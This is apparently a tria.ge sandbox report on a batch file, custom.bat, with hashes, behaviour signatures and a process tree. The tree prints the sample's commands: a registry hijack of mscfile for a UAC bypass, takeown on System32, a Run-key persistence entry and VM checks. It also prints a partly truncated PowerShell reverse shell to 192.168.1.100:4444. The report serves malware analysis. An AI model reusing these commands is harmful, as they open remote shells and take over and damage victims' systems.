Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
146s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
08/09/2024, 06:47
Static task
static1
Behavioral task
behavioral1
Sample
custom.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
custom.bat
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
custom.bat
Resource
win10v2004-20240802-en
Behavioral task
behavioral4
Sample
custom.bat
Resource
win11-20240802-en
General
-
Target
custom.bat
-
Size
4KB
-
MD5
1c63745d54962d205bb3ae879bea1ed4
-
SHA1
a832c894a4e2b6d486c48b9ea6ec79d94df9537e
-
SHA256
396ea933ebc00327d2ea983206ccd2a832999c28a7df070000fe9874890b5a0e
-
SHA512
129d73d0fd5967b232c54d50bc94ed171dd2ee5da2222b18bd350b42808799575a3a726c7b0b46b65d2717d025b9ebeb424a834f42540daf8308be3171a4af39
-
SSDEEP
96:NQN1Vh0eAwx86mwCVHVsOvx8vXSu7eQ/GdZj/BawH6im7BFVPhGHixL:NOueA8CVHiOvx8vC0emG7LBawH6/Yix
Malware Config
Signatures
-
Modifies file permissions 1 TTPs 2 IoCs
pid Process 4204 takeown.exe 4732 takeown.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\TotalDestruction = "C:\\Users\\Admin\\AppData\\Local\\Temp\\custom.bat" reg.exe -
pid Process 1308 powershell.exe 2492 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 2 IoCs
pid Process 1940 timeout.exe 1136 timeout.exe -
Gathers system information 1 TTPs 3 IoCs
Runs systeminfo.exe.
pid Process 1996 systeminfo.exe 4132 systeminfo.exe 744 systeminfo.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile\shell\open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile reg.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile\shell\open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile\shell\open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile\shell\open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile\shell reg.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile\shell reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\full_destruction.bat" reg.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings cmd.exe Key deleted \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile reg.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2492 powershell.exe 2492 powershell.exe 2492 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2492 powershell.exe Token: SeTakeOwnershipPrivilege 4732 takeown.exe Token: SeDebugPrivilege 1308 powershell.exe Token: SeTakeOwnershipPrivilege 4204 takeown.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 4664 wrote to memory of 3096 4664 cmd.exe 74 PID 4664 wrote to memory of 3096 4664 cmd.exe 74 PID 4664 wrote to memory of 2492 4664 cmd.exe 75 PID 4664 wrote to memory of 2492 4664 cmd.exe 75 PID 4664 wrote to memory of 1940 4664 cmd.exe 76 PID 4664 wrote to memory of 1940 4664 cmd.exe 76 PID 4664 wrote to memory of 1964 4664 cmd.exe 77 PID 4664 wrote to memory of 1964 4664 cmd.exe 77 PID 4664 wrote to memory of 3328 4664 cmd.exe 78 PID 4664 wrote to memory of 3328 4664 cmd.exe 78 PID 4664 wrote to memory of 1136 4664 cmd.exe 81 PID 4664 wrote to memory of 1136 4664 cmd.exe 81 PID 3328 wrote to memory of 4732 3328 cmd.exe 82 PID 3328 wrote to memory of 4732 3328 cmd.exe 82 PID 4664 wrote to memory of 2484 4664 cmd.exe 83 PID 4664 wrote to memory of 2484 4664 cmd.exe 83 PID 4664 wrote to memory of 1996 4664 cmd.exe 84 PID 4664 wrote to memory of 1996 4664 cmd.exe 84 PID 4664 wrote to memory of 404 4664 cmd.exe 85 PID 4664 wrote to memory of 404 4664 cmd.exe 85 PID 4664 wrote to memory of 4132 4664 cmd.exe 88 PID 4664 wrote to memory of 4132 4664 cmd.exe 88 PID 4664 wrote to memory of 4244 4664 cmd.exe 89 PID 4664 wrote to memory of 4244 4664 cmd.exe 89 PID 4664 wrote to memory of 744 4664 cmd.exe 90 PID 4664 wrote to memory of 744 4664 cmd.exe 90 PID 4664 wrote to memory of 1484 4664 cmd.exe 91 PID 4664 wrote to memory of 1484 4664 cmd.exe 91 PID 4664 wrote to memory of 1308 4664 cmd.exe 92 PID 4664 wrote to memory of 1308 4664 cmd.exe 92 PID 4664 wrote to memory of 4584 4664 cmd.exe 93 PID 4664 wrote to memory of 4584 4664 cmd.exe 93 PID 4664 wrote to memory of 4204 4664 cmd.exe 94 PID 4664 wrote to memory of 4204 4664 cmd.exe 94
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4664 -
C:\Windows\system32\mode.commode con: cols=800 lines=602⤵PID:3096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2492
-
-
C:\Windows\system32\timeout.exetimeout /t 52⤵
- Delays execution with timeout.exe
PID:1940
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" /f2⤵
- Modifies registry class
PID:1964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3328 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\* /r /d y3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4732
-
-
-
C:\Windows\system32\timeout.exetimeout /t 52⤵
- Delays execution with timeout.exe
PID:1136
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Classes\mscfile" /f2⤵
- Modifies registry class
PID:2484
-
-
C:\Windows\system32\systeminfo.exesysteminfo2⤵
- Gathers system information
PID:1996
-
-
C:\Windows\system32\findstr.exefindstr /i "VirtualBox"2⤵PID:404
-
-
C:\Windows\system32\systeminfo.exesysteminfo2⤵
- Gathers system information
PID:4132
-
-
C:\Windows\system32\findstr.exefindstr /i "VMware"2⤵PID:4244
-
-
C:\Windows\system32\systeminfo.exesysteminfo2⤵
- Gathers system information
PID:744
-
-
C:\Windows\system32\findstr.exefindstr /i "Hyper-V"2⤵PID:1484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1308
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "TotalDestruction" /d "C:\Users\Admin\AppData\Local\Temp\custom.bat" /f2⤵
- Adds Run key to start application
PID:4584
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\* /r /d y2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4204
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD542d4b1d78e6e092af15c7aef34e5cf45
SHA16cf9d0e674430680f67260194d3185667a2bb77b
SHA256c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0
SHA512d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930
-
Filesize
1KB
MD5ad24b88758d81706886a3b4a0f8e7573
SHA1907a8d47973c5d1371cc696216cce9002c421311
SHA2569039dfb2a9c4c27da494ed9cf21541a7b021ce310ffeaa89f36703f4642a9bb3
SHA512b94b8c8bf61c76e6a4967cb5859ca0f6f65a6373434594b2a984c18aefa7c7719097a602f6a760fb09902f4ed1f0b33c4662ccfb38a09eba820170d15a830030
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
285B
MD54577f08330df24a350ff523ec87bf38e
SHA15bd1a1b1b8ca3b007102a75f7abaf72348955cf2
SHA2565ef497b0848b259cbfdeb4057846d9a0f3907ec77aabe44219462ac6160bacae
SHA512ed614d6c11981ac9b1aaee0455f4d1b07dce08c0e04fb9f78ad3a7c57db0ecd8e9e0fe21292e599b4963acc8bb66e8db88759fd5fd5fee94df4d3f75cab736c2